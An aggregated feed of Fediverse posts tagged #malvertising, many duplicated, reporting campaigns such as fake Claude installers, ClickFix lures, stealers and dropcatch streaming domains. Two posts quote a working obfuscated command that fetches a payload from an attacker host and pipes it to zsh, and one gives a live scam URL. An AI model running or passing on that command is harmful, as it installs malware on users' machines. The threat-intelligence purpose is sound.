home.social

#malvertising — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #malvertising, aggregated by home.social.

fetched live
  1. Ad blocking keeps being treated as a preference, or as a small moral argument about whether a website gets paid. Here is why ad blockers will always stay relevant: the web's advertising machinery is also a security boundary, and that boundary keeps failing.

    According to the article, Adform was compromised and began serving malicious ad code on 27 July. The nasty bit was not just tracking or a bad redirect: the code repeatedly swapped crypto wallet addresses in a victim's clipboard, so a pasted address could become the attacker's address instead.

    The boring lesson is still the correct one. If third-party ad code can run in your browser, your threat model includes whoever managed to get into that ad pipeline today. The safer default is still to block the code before it gets a vote.

    this.weekinsecurity.com/online

    #malvertising #privacy #cybersecurity

  2. Ad blocking keeps being treated as a preference, or as a small moral argument about whether a website gets paid. Here is why ad blockers will always stay relevant: the web's advertising machinery is also a security boundary, and that boundary keeps failing.

    According to the article, Adform was compromised and began serving malicious ad code on 27 July. The nasty bit was not just tracking or a bad redirect: the code repeatedly swapped crypto wallet addresses in a victim's clipboard, so a pasted address could become the attacker's address instead.

    The boring lesson is still the correct one. If third-party ad code can run in your browser, your threat model includes whoever managed to get into that ad pipeline today. The safer default is still to block the code before it gets a vote.

    this.weekinsecurity.com/online

    #malvertising #privacy #cybersecurity

  3. FYI: SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. ppc.land/sourtrade-malvertisin #CyberSecurity #Malware #DigitalMarketing #Malvertising #AdTech

  4. FYI: SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. ppc.land/sourtrade-malvertisin #CyberSecurity #Malware #DigitalMarketing #Malvertising #AdTech

  5. ICYMI: SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. ppc.land/sourtrade-malvertisin #Malvertising #CyberSecurity #Malware #InternetSafety #AdTech

  6. SourTrade malvertising builds malware inside browsers, hits 12 countries: Confiant documents browser-side malware assembly defeating file scanning as SourTrade ads keep running through Google, Meta and X advertising infrastructure. ppc.land/sourtrade-malvertisin #Malvertising #SourTrade #CyberSecurity #Malware #OnlineSafety

  7. Inside FakeAgent: How a Claude Desktop Malvertising Campaign Hit 29 Organizations with SectopRAT

    Between July 21-22, 2026, 29 organizations were compromised through a sophisticated malvertising campaign exploiting Claude AI's legitimate domain. Victims searching for Claude Desktop via Bing encountered sponsored advertisements leading to a malicious Claude Artifact hosted on the authentic Claude.ai domain. This artifact redirected users to attacker-controlled infrastructure distributing a fake ClaudeDesktop.exe file containing SectopRAT. The malware employed advanced anti-analysis techniques including VMProtect packing, GPU-based virtual machine detection, and DirectX shader-based payload decryption. Command-and-control infrastructure utilized EtherHiding, storing C2 addresses in Ethereum blockchain transactions for resilience against takedowns. The remote access trojan exfiltrated credit card data, credentials, browser information, and personal files. Analysis revealed connections to previous campaigns dating to December 2025, with infrastructure linked to Operation Endgame seizures and StealC distrib...

    Pulse ID: 6a616004250472ee87e19829
    Pulse Link: otx.alienvault.com/pulse/6a616
    Pulse Author: AlienVault
    Created: 2026-07-23 00:27:48

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #BlockChain #Browser #CreditCard #CyberSecurity #EtherHiding #InfoSec #Mac #Malvertising #Malware #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Stealc #Trojan #Troll #bot #AlienVault

  8. Inside FakeAgent: How a Claude Desktop Malvertising Campaign Hit 29 Organizations with SectopRAT

    Between July 21-22, 2026, 29 organizations were compromised through a sophisticated malvertising campaign exploiting Claude AI's legitimate domain. Victims searching for Claude Desktop via Bing encountered sponsored advertisements leading to a malicious Claude Artifact hosted on the authentic Claude.ai domain. This artifact redirected users to attacker-controlled infrastructure distributing a fake ClaudeDesktop.exe file containing SectopRAT. The malware employed advanced anti-analysis techniques including VMProtect packing, GPU-based virtual machine detection, and DirectX shader-based payload decryption. Command-and-control infrastructure utilized EtherHiding, storing C2 addresses in Ethereum blockchain transactions for resilience against takedowns. The remote access trojan exfiltrated credit card data, credentials, browser information, and personal files. Analysis revealed connections to previous campaigns dating to December 2025, with infrastructure linked to Operation Endgame seizures and StealC distrib...

    Pulse ID: 6a616004250472ee87e19829
    Pulse Link: otx.alienvault.com/pulse/6a616
    Pulse Author: AlienVault
    Created: 2026-07-23 00:27:48

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #BlockChain #Browser #CreditCard #CyberSecurity #EtherHiding #InfoSec #Mac #Malvertising #Malware #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Stealc #Trojan #Troll #bot #AlienVault

  9. Shared Claude Chats Meet ClickFix

    A ClickFix campaign has been identified that abuses Anthropic's Claude platform through shareable chat links to distribute MacSync Stealer targeting macOS users. Attackers utilized malvertising with paid Google ads to direct victims searching for Claude-related terms to malicious shared Claude chats falsely labeled as 'Apple Support.' These chats contained obfuscated installation commands that, when executed, deployed a multi-stage infection chain. The malware steals credentials from browsers and password managers, cryptocurrency wallet data, sensitive files, and system information. The campaign ran from June 12-19, 2026, targeting primarily Mac users with Russian-language comments in the code suggesting Russian-speaking threat actors. Domains used adopted themes related to U.S. local services to appear legitimate.

    Pulse ID: 6a57b1d61379f5309f46131d
    Pulse Link: otx.alienvault.com/pulse/6a57b
    Pulse Author: AlienVault
    Created: 2026-07-15 16:14:14

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CyberSecurity #Google #GoogleAds #InfoSec #Mac #MacOS #Malvertising #Malware #OTX #OpenThreatExchange #Password #Russia #Word #bot #cryptocurrency #AlienVault

  10. Shared Claude Chats Meet ClickFix

    A ClickFix campaign has been identified that abuses Anthropic's Claude platform through shareable chat links to distribute MacSync Stealer targeting macOS users. Attackers utilized malvertising with paid Google ads to direct victims searching for Claude-related terms to malicious shared Claude chats falsely labeled as 'Apple Support.' These chats contained obfuscated installation commands that, when executed, deployed a multi-stage infection chain. The malware steals credentials from browsers and password managers, cryptocurrency wallet data, sensitive files, and system information. The campaign ran from June 12-19, 2026, targeting primarily Mac users with Russian-language comments in the code suggesting Russian-speaking threat actors. Domains used adopted themes related to U.S. local services to appear legitimate.

    Pulse ID: 6a57b1d61379f5309f46131d
    Pulse Link: otx.alienvault.com/pulse/6a57b
    Pulse Author: AlienVault
    Created: 2026-07-15 16:14:14

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CyberSecurity #Google #GoogleAds #InfoSec #Mac #MacOS #Malvertising #Malware #OTX #OpenThreatExchange #Password #Russia #Word #bot #cryptocurrency #AlienVault

  11. Vidar Stealer and XMRig Miner Delivered via Fake Cracked Software

    A newly identified malvertising campaign is delivering Vidar Stealer and the XMRig cryptominer to consumers and Small and Medium-sized Business (SMBs) worldwide.

    Pulse ID: 6a558bf9f5b18c751ac306df
    Pulse Link: otx.alienvault.com/pulse/6a558
    Pulse Author: cryptocti
    Created: 2026-07-14 01:08:09

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CryptoMiner #CyberSecurity #InfoSec #Malvertising #OTX #OpenThreatExchange #SMB #Vidar #XMRigMiner #bot #cryptocti

  12. Vidar Stealer and XMRig Miner Delivered via Fake Cracked Software

    A newly identified malvertising campaign is delivering Vidar Stealer and the XMRig cryptominer to consumers and Small and Medium-sized Business (SMBs) worldwide.

    Pulse ID: 6a558bf9f5b18c751ac306df
    Pulse Link: otx.alienvault.com/pulse/6a558
    Pulse Author: cryptocti
    Created: 2026-07-14 01:08:09

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #CryptoMiner #CyberSecurity #InfoSec #Malvertising #OTX #OpenThreatExchange #SMB #Vidar #XMRigMiner #bot #cryptocti

  13. …ed ecco l’ultima evoluzione di questo #scam nella sua versione italiana.
    Questa volta la campagna viene servita direttamente all’interno dell’app de Il Post, tramite un annuncio pubblicitario che abusa dell’identità di la Repubblica e rimanda a un sito WordPress compromesso.
    L’utente vede un contenuto apparentemente credibile, ma in realtà sta entrando in una classica catena di malvertising → fake news → scam cripto.
    L’annuncio risulta distribuito tramite Google Ads. Le informazioni di trasparenza mostrano un inserzionista verificato da Google, ma il pagamento dell’annuncio è attribuito a un altro soggetto.
    Questo evidenzia quanto sia difficile attribuire con certezza queste campagne e quanto sia importante analizzare l’intera filiera.
    #italia #cryptoscam #IlPost #malvertising

  14. Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽

    We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️

    While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀 , MLB ⚾ :, esports 🎮 , poker 🃏 , or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.

    Some examples from the domains we've uncovered so far:

    :Dropcatch domains host or redirect to illegal streaming services

    autoredistrict[.]org
    childreninachangingclimate[.]org
    2026worldcupnorthamerica[.]com
    folsomprisonmuseum[.]org
    allaboutbasketball[.]us
    thebreastcancercharities[.]org

    :Fraudulent domains host or redirect to illegal streaming services

    90phutaa[.]cc
    90phutab[.]cc
    90phutac[.]cc
    xoilaczzzzw[.]tv
    xoilaczzzzt[.]tv
    xoilaczzzzh[.]tv

    :Lookalike domains used by the betting platforms

    fifa001[.]com
    fifa002[.]com
    fifa02[.]com
    worldcup00[.]com
    worldcup000[.]com
    worldcup02[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut

  15. Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽

    We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️

    While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀 , MLB ⚾ :, esports 🎮 , poker 🃏 , or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.

    Some examples from the domains we've uncovered so far:

    :Dropcatch domains host or redirect to illegal streaming services

    autoredistrict[.]org
    childreninachangingclimate[.]org
    2026worldcupnorthamerica[.]com
    folsomprisonmuseum[.]org
    allaboutbasketball[.]us
    thebreastcancercharities[.]org

    :Fraudulent domains host or redirect to illegal streaming services

    90phutaa[.]cc
    90phutab[.]cc
    90phutac[.]cc
    xoilaczzzzw[.]tv
    xoilaczzzzt[.]tv
    xoilaczzzzh[.]tv

    :Lookalike domains used by the betting platforms

    fifa001[.]com
    fifa002[.]com
    fifa02[.]com
    worldcup00[.]com
    worldcup000[.]com
    worldcup02[.]com

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut

  16. Malvertising Campaign Spreads FlutterShell Backdoor to macOS Users

    macOS users beware: a sneaky malware called FlutterShell is spreading through malicious ads and infected desktop apps, allowing hackers to take control of your device and steal sensitive data. This stealthy backdoor can execute commands, access files, and even siphon off browser session info - all while masquerading as legitimate software.

    osintsights.com/malvertising-c

    #Macos #Fluttershell #Backdoor #Malware #Malvertising

  17. Malvertising Campaign Targets macOS with FlutterShell Backdoor

    Google swiftly suspended advertiser accounts linked to a massive malvertising campaign that spread a new macOS backdoor, known as FlutterShell, after researchers sounded the alarm. The culprits, tracked by Palo Alto Networks as CL-CRI-1089, used hundreds of verified Google ads and a web of shell companies to deceive ad networks.

    osintsights.com/malvertising-c

    #Macos #Malvertising #FluttershellBackdoor #Clcri1089 #GoogleAds

  18. The top result for "claude code" on Google right now is malvertising. We are so cooked.

    anvil-89[.]com
    sites[.]google[.]com/newappclaude.com/clau-ver-un-30

    ```
    echo "Downloading Claude: claude.ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC8zYTNlYzQxZTQ3NGJlODFjZWMzYTk5OTE5NmJmYThiZTY5YTI5MTliNWZkYWY3ZTA1ZGEzZjU3Y2U2YjRhYTMx" | openssl base64 -d -A) | zsh
    ```

    #Cybersecurity #Security #Malvertising #Malware #Google #AdTech #Advertising #ThreatIntelligence #ThreatIntel

  19. The top result for "claude code" on Google right now is malvertising. We are so cooked.

    anvil-89[.]com
    sites[.]google[.]com/newappclaude.com/clau-ver-un-30

    ```
    echo "Downloading Claude: claude.ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC8zYTNlYzQxZTQ3NGJlODFjZWMzYTk5OTE5NmJmYThiZTY5YTI5MTliNWZkYWY3ZTA1ZGEzZjU3Y2U2YjRhYTMx" | openssl base64 -d -A) | zsh
    ```

    #Cybersecurity #Security #Malvertising #Malware #Google #AdTech #Advertising #ThreatIntelligence #ThreatIntel

  20. @kitkat_blue @thomasfuchs Are there any good Chromium-based browsers which provide the functionality for which most current #Brave users presumably intend to attain by installing Brave?

    I need something to recommend or install for clients who want to replace Chrome or Edge with something familiar, while protecting them from #surveillance, #malvertising, and other ad- or tracking-based threats.

    A disenshittified Firefox fork + uBlock Origin works for those who are willing to adapt to a slightly different look and feel, but a lot of clients insist (in different words) on maintaining as close to the #Chromium UX as possible.

    #privacy

  21. @kitkat_blue @thomasfuchs Are there any good Chromium-based browsers which provide the functionality for which most current #Brave users presumably intend to attain by installing Brave?

    I need something to recommend or install for clients who want to replace Chrome or Edge with something familiar, while protecting them from #surveillance, #malvertising, and other ad- or tracking-based threats.

    A disenshittified Firefox fork + uBlock Origin works for those who are willing to adapt to a slightly different look and feel, but a lot of clients insist (in different words) on maintaining as close to the #Chromium UX as possible.

    #privacy

  22. Malvertisers Exploit Code Signing in TamperedChef Malware Campaigns

    Meet the sneaky malware campaign that's been flying under the radar, leveraging polished marketing tactics and code signing to spread its malicious reach - with over 4,000 samples and 100 unique variants uncovered across three distinct clusters of activity.

    osintsights.com/malvertisers-e

    #TamperedchefMalware #CodeSigning #MalwareOperations #Malvertising #PaloAltoNetworks

  23. Malicious Android Apps Fuel 659M Daily Ad Fraud Bid Requests

    Meet Trapdoor, a massive ad fraud scam driven by 455 malicious Android apps that generated a whopping 659 million daily bid requests at its peak, all while hiding in plain sight as harmless utilities like PDF viewers and file managers. These fake apps tricked users into installing malware, unleashing a hidden ad fraud operation…

    osintsights.com/malicious-andr

    #AdFraud #Malvertising #AndroidMalware #MobileSecurity #EmergingThreats

  24. Trapdoor Android Ad Fraud Scheme Exposes 455 Malicious Apps

    Meet Trapdoor, a massive Android ad fraud scheme that used 455 malicious apps to generate a staggering 659 million daily bid requests, fueling a self-sustaining machine that turned innocent installs into big bucks. This complex operation was uncovered by HUMAN's Satori Threat Intelligence and Research Team, shedding light on a pipeline for…

    osintsights.com/trapdoor-andro

    #AndroidAdFraud #Malvertising #Trapdoor #MobileSecurity #AdFraud

  25. Hackers are abusing the popularity of AI tools with a fake #ClaudeAI website that spreads a newly discovered backdoor called #Beagle. The campaign uses DLL sideloading, #malvertising, and trusted signed files to infect Windows systems.

    Read: hackread.com/hackers-fake-clau

    #Cybersecurity #Malware #ClaudeAI #ArtificialIntelligence

  26. Hackers are abusing the popularity of AI tools with a fake #ClaudeAI website that spreads a newly discovered backdoor called #Beagle. The campaign uses DLL sideloading, #malvertising, and trusted signed files to infect Windows systems.

    Read: hackread.com/hackers-fake-clau

    #Cybersecurity #Malware #ClaudeAI #ArtificialIntelligence

  27. Malicious Site Exploits AI Interest to Deploy Beagle Backdoor

    Beware of a fake website masquerading as Anthropic's Claude interface, tricking users into downloading a 505 MB ZIP archive that unleashes a new, previously undocumented Windows backdoor called Beagle. This malicious campaign uses a convincing imitation of the legitimate site to spread the infection.

    osintsights.com/malicious-site

    #BeagleBackdoor #AiMalware #WindowsMalware #Malvertising #DllSideloading

  28. MakeUseOf: Homebrew users are accidentally downloading malware instead of the real app. “A malicious Google ad campaign is targeting users of a popular free, open-source software package manager for macOS and Linux that simplifies installing, updating, and managing command-line tools. Your password and personal data could be at serious risk.”

    https://rbfirehose.com/2026/05/05/makeuseof-homebrew-users-are-accidentally-downloading-malware-instead-of-the-real-app/
  29. MakeUseOf: Homebrew users are accidentally downloading malware instead of the real app. “A malicious Google ad campaign is targeting users of a popular free, open-source software package manager for macOS and Linux that simplifies installing, updating, and managing command-line tools. Your password and personal data could be at serious risk.”

    https://rbfirehose.com/2026/05/05/makeuseof-homebrew-users-are-accidentally-downloading-malware-instead-of-the-real-app/
  30. And now a funny commentary. This guy from India or Russia or whatever spent quite literally 3-4 HOURS with my 93-year-old mom trying to get her to install stuff, share her screen, and get through a password change. In that time she managed to install 2 apps and change TWO passwords. That’s it.

    He should have been some kind of priest, rabbi, or imam or something. Patience. Of. A. Saint. Sad to think of this amazing super power going to waste on a life of crime.

    I have to do these things with her and I can’t get them done any faster than that. But I don’t have the stamina to go 4 hours in the ring with her. 😜 This guy is impressive.
    #identitytheft #malvertising #security

  31. If anyone wants to see the scam that got my mom, here's a video capture of what it does. It plays a computer voice saying fantastic bullshit like "Your computer has the identity theft virus".

    I'm pretty sure this was malvertising. Looking at her safari history, she was on a grocery store web site trying to place an order. Then this URL is next in the history. And after that, it's all password change pages and such. I can't imagine she had any reason to click on something other than seeing a fake "security alert."

    In the video, this is not fullscreen. But when I clicked that link, it went full screen.

    What the hell, Paco, you clicked the damn link? Yeah, not on purpose. I was trying to right click it to copy it, and either TeamViewer misunderstood the click or I fat-fingered it. But, having made the mistake, I decided to shoot some video. I got lucky.

    Here's the URL (still live as of about 60 minutes ago):
    https: / / xdrty-c6e6cjecbve4f9bz,z02,azurefd,net/mhelpxxx/index,html?bcda=1-833-371-8269#%E2%80%99
    #identitytheft #malvertising

  32. SmokedHam e UNC2465: il backdoor dei ransomware operator che si nasconde nei tool IT più usati dagli amministratori

    Orange Cyberdefense ha documentato una campagna di malvertising attiva nel 2026 in cui UNC2465, gruppo affiliato a DarkSide, LockBit e Qilin, distribuisce il backdoor SmokedHam tramite falsi installer di PuTTY, RVTools e altri tool IT. L'obiettivo finale è il ransomware.

    insicurezzadigitale.com/smoked

  33. Fałszywe strony Claude Code w sponsorowanych wynikach dostarczają malware

    Badacze bezpieczeństwa z Push Security odkryli nową kampanię fałszywych stron, które podszywają się pod popularne narzędzia takie jak Claude Code. Na stronach zamieszczone są instrukcje instalacji, nakłaniające ofiary (przekonane, że uruchamiają wiarygodny program) do instalowania złośliwego oprogramowania. Strony te są promowane w Google Ads, dzięki czemu pojawiają się wysoko w...

    #WBiegu #Claude #Installfix #Malvertising #Malware

    sekurak.pl/falszywe-strony-cla

  34. We planned one report on Keitaro abuse, but we ran out of pages before we ran out of cases.
    So here’s Part 2 of 3, a medley of threats that go well beyond AI‑investment scams.

    Threat actors abuse Keitaro’s traffic distribution, cloaking, and rule engine to hide malicious landing pages behind geo and device-based filters. They stack bulletproof hosting and reverse proxies to add layers of indirection, making takedown and analysis harder. In this post, we share how we overcame this using multi‑protocol, multi‑vantage telemetry. We leveraged JA4+ web server fingerprints, DNS analytics, and Confiant’s visibility into advertising supply chain data to uncover Keitaro abuse and the delivery of malware downloaders, infostealers, weaponized RMMs, wallet drainer campaigns, scams, and email spam and advertising attack vectors.

    If you hunt threats distributed via adtech, these indicators can be useful pivots. infoblox.com/blog/threat-intel

    #dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising #infostealer #rmm #remotemonitoringmanagement #downloader #malware #spam #airdrop #cryptocurrency #ja4 #ja4_fingerprinting